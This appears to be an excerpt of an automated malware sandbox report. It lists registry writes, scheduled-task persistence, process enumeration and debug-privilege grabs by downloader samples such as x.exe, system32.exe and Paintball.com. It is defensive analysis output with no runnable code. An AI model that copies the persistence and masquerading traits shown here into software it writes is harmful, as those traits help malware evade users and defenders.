Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Control Panel\Desktop\TileWallpaper = "0" C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Explorer.EXE N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133786810330824482" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1920x1080x96(1).bottom = "968" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix C:\Windows\system32\BackgroundTransferHost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1920x1080x96(1).top = "260" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1920x1080x96(1).right = "1556" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\system32\BackgroundTransferHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MaxPos1920x1080x96(1).x = "4294967295" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1920x1080x96(1).top = "327" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\MuiCache C:\Windows\system32\BackgroundTransferHost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616257" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1920x1080x96(1).y = "4294967295" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\system32\BackgroundTransferHost.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1920x1080x96(1).x = "4294967295" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MaxPos1920x1080x96(1).y = "4294967295" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe10000000c31c8bd7af18db019ca068d0c318db01331211f7644edb0114000000 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1920x1080x96(1).left = "417" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0" C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3\NodeSlot = "9" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1920x1080x96(1).right = "2145" C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3\MRUListEx = ffffffff C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1920x1080x96(1).bottom = "901" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A8CDFF1C-4878-43be-B5FD-F8091C1C60D0}\Instance\ C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1920x1080x96(1).left = "1006" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupView = "0" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 03000000010000000200000000000000ffffffff C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-B9IG3.tmp\stories.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-B9IG3.tmp\stories.tmp N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe N/A
N/A N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
